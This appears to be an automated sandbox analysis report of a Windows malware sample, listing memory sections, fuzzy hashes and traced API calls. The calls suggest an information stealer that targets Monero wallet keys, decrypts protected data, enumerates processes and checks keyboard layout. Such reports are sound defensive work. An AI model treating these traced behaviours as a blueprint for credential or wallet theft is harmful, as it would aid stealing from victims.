                       • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: )_r$!8n$!8n$719d$R}/$V*s$\mw$gjMY$9|
                      • API String ID: 0-306087274
                      • Opcode ID: c0d1a75898de9aaf887df7d28672cd850b9674f1d04ac10bf50ff80fcd7ad98e
                      • Instruction ID: bc953d7ca646ea60d7fee298ec5079902156710505cc4c5c0463f3f315194ba1
                      • Opcode Fuzzy Hash: c0d1a75898de9aaf887df7d28672cd850b9674f1d04ac10bf50ff80fcd7ad98e
                      • Instruction Fuzzy Hash: 5CB227F3A0C6049FE3046E2DEC8567ABBE9EBD4720F1A463DEAC4C3744E93558058697
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • GetKeyboardLayoutList.USER32(00000000,00000000,001E05AF), ref: 001D7BE1
                      • LocalAlloc.KERNEL32(00000040,?), ref: 001D7BF9
                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 001D7C0D
                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 001D7C62
                      • LocalFree.KERNEL32(00000000), ref: 001D7D22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                       • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                      • String ID: /
                      • API String ID: 3090951853-4001269591
                      • Opcode ID: ab9f66a5411096324883d0c244dfe4778822bc1226879aae9068aa0ad16ae1e0
                      • Instruction ID: 42e78ddd978dd5741c2c707d564f3b322e6162c6bf8f37f008edf10f70f16de1
                      • Opcode Fuzzy Hash: ab9f66a5411096324883d0c244dfe4778822bc1226879aae9068aa0ad16ae1e0
                      • Instruction Fuzzy Hash: 36416D71940228ABCB24DF94DC99BEEB378FF58700F6041DAE40962280DB742F85CFA5
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001E0D73), ref: 001CE4A2
                      • StrCmpCA.SHLWAPI(?,001E14F8), ref: 001CE4F2
                      • StrCmpCA.SHLWAPI(?,001E14FC), ref: 001CE508
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CEBDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                       • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 433455689-1173974218
                      • Opcode ID: a8b4c378421adea72428ff6a29da2220fb929a4b69d251a463f0f06e9015c6f0
                      • Instruction ID: 3a6bbf247d11cfd55fd86ad8f296845e6593ee70615a29b4bed862babd161d84
                      • Opcode Fuzzy Hash: a8b4c378421adea72428ff6a29da2220fb929a4b69d251a463f0f06e9015c6f0
                      • Instruction Fuzzy Hash: 8E1246719101549BDB18FB70DCA6EEE7378AF64300FC045AAB50A96291EF306F49CF96
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                       • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: %wW|$O/vw$]Q~$a{o$ed1v$GZo
                      • API String ID: 0-1058592437
                      • Opcode ID: dca32842afa0b710489ad303f8ea7ecbbe30b5b812bad2e04c7197a98a917baa
                      • Instruction ID: 8ee541b3a4e814ea34645f568e66012636c7d278b9740dcc3595d8b46e234da8
                      • Opcode Fuzzy Hash: dca32842afa0b710489ad303f8ea7ecbbe30b5b812bad2e04c7197a98a917baa
                      • Instruction Fuzzy Hash: CAB205B360C204AFE304AE29EC8567AF7E9EFD4720F1A892DE6C4C7744E63558418797
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                       • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .&o>$AM7?$Cqs~$S^rZ$ax_'$w#wn
                      • API String ID: 0-356560627
                      • Opcode ID: 1304d46dec483294ed4b4964a04615bd1b66f1f2fdf83196dc13a5ff21c91567
                      • Instruction ID: 5075b03a0573ceb7f709830b0095cf43bbad65fdaa7db2fad3f98edfc3d83068
                      • Opcode Fuzzy Hash: 1304d46dec483294ed4b4964a04615bd1b66f1f2fdf83196dc13a5ff21c91567
                      • Instruction Fuzzy Hash: B682E7F360C600AFE304AE2DEC8577ABBE9EF94720F1A853DE6C5C7744E53598018696
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                       • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: '4Y|$+6?$.+<$STpa$v;[^
                      • API String ID: 0-1836363471
                      • Opcode ID: 69a964a06cdd3d737667768d783d052a849826e1e35ff123681e8147239470bd
                      • Instruction ID: 56056c4e5d56022f6f8d729b4b408eb533ab17179bbf6d5eab1101287459d152
                      • Opcode Fuzzy Hash: 69a964a06cdd3d737667768d783d052a849826e1e35ff123681e8147239470bd
                      • Instruction Fuzzy Hash: BFB207F390C2049FE304AE29EC8567AFBE5EF94720F1A853DEAC487744EA3558058797
                      APIs
                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001CC871
                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001CC87C
                      • lstrcat.KERNEL32(?,001E0B46), ref: 001CC943
                      • lstrcat.KERNEL32(?,001E0B47), ref: 001CC957
                      • lstrcat.KERNEL32(?,001E0B4E), ref: 001CC978
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                       • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$BinaryCryptStringlstrlen
                      • String ID:
                      • API String ID: 189259977-0
                      • Opcode ID: 2f5c0a455db6c9f0953edcacb1d93934bc051010d54a12bcf7283ea6102faf35
                      • Instruction ID: 5b1f5888ea485de3d4157b1037588bf91de92af5cc62f9fade9c1a2ccb2574dc
                      • Opcode Fuzzy Hash: 2f5c0a455db6c9f0953edcacb1d93934bc051010d54a12bcf7283ea6102faf35
                      • Instruction Fuzzy Hash: 8A415EB590421ADBDB10DF90DD89FFEB7B8BB48704F1045A8E509B6280D7749A84CF96
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 001D696C
                      • sscanf.NTDLL ref: 001D6999
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001D69B2
                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001D69C0
                      • ExitProcess.KERNEL32 ref: 001D69DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      • Opcode ID: a69c39efe0fb7316da4bd483f9e710a28d80b0e0a2bd8714fa610f30df56ad32
                      • Instruction ID: ba96b0b3d86b069de926744f545de427a653afba36feaa7c05b26bc2a1350a4f
                      • Opcode Fuzzy Hash: a69c39efe0fb7316da4bd483f9e710a28d80b0e0a2bd8714fa610f30df56ad32
                      • Instruction Fuzzy Hash: C021CB76D14208AFCF08EFE4D955AEEB7B9BF48304F04852AE406F3250EB345615CBA9
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001C724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C7254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001C7281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001C72A4
                      • LocalFree.KERNEL32(?), ref: 001C72AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: 96b325f3b2eace8405d8bb3dc8d0bc8fe8500cc9063b822db3174a5cb5f0e1c1
                      • Instruction ID: d261f1ddfd88882f5cb6379a272cd43dd7934c52360cf1151057a43cd4ad3bac
                      • Opcode Fuzzy Hash: 96b325f3b2eace8405d8bb3dc8d0bc8fe8500cc9063b822db3174a5cb5f0e1c1
                      • Instruction Fuzzy Hash: 4D0100B5A40308BBEB14DBD4CD49F9D7778AB44700F108558FB05BB2C0D7B0AA118B69
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001D961E
                      • Process32First.KERNEL32(001E0ACA,00000128), ref: 001D9632
                      • Process32Next.KERNEL32(001E0ACA,00000128), ref: 001D9647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 001D965C
                      • CloseHandle.KERNEL32(001E0ACA), ref: 001D967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: d30e3a431c3cda1dcb33abb829e9db12231dbdbf922a965ae2b1413f9e61c2bd
                      • Instruction ID: e71cd0cb5e2e9a2f63f3b9b23596574e4037a720a9c7e49e0701c7134a8d1113
                      • Opcode Fuzzy Hash: d30e3a431c3cda1dcb33abb829e9db12231dbdbf922a965ae2b1413f9e61c2bd
                      • Instruction Fuzzy Hash: 8E010CB5A00308ABDB14DFA5CD48BEDB7F8EB48700F108199A905A7340E734DB50CF51
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: JFk$a~~${G{$@:7
                      • API String ID: 0-4074208610
                      • Opcode ID: 6ed58c8f2736066b8b02802e8b335978fa8054ebc51ea7fd1b093d8d74bf1e68
                      • Instruction ID: c45f560f03ac8615fc09b4c1b10cf6e6a108b463b9b3d4de168c097b3d1bf19e
                      • Opcode Fuzzy Hash: 6ed58c8f2736066b8b02802e8b335978fa8054ebc51ea7fd1b093d8d74bf1e68
                      • Instruction Fuzzy Hash: 0DB2E7F3A0C204AFE704AE29EC8577ABBE9EF94320F16453DE6C5C7344E63598058697
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: X@QK$[}t$^.[$t*D@
                      • API String ID: 0-966779423
                      • Opcode ID: dac6a0f7d806658d9316682c7dbeb781424f9e21dc9c1c9e171b4e871c3ff4dd
                      • Instruction ID: 3a60c492c36965c0052db4016a45ac33ef88af44684d1b3ad6bcffb9fb4098b2
                      • Opcode Fuzzy Hash: dac6a0f7d806658d9316682c7dbeb781424f9e21dc9c1c9e171b4e871c3ff4dd
                      • Instruction Fuzzy Hash: 23B2F6B3A0C204AFD304AE29EC8567AF7E9EF94720F16893DEAC4C3744E63558458797
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,001C5184,40000001,00000000,00000000,?,001C5184), ref: 001D8EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
